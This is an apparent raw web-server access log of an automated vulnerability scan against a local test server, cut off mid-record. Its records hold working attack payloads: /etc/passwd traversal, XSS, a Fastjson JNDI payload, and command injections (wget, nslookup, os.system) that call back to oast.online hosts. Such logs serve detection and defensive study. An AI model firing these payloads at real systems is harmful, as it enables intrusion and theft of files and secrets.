+{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28q98smpvbk9ig07h0qakpg7ks4gia1.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca28q98smpvbk9ig07h0u4tkj8hqqbmh8.oast.online\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fca28q98smpvbk9ig07h0n7rngd7wc11bm.oast.online%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", 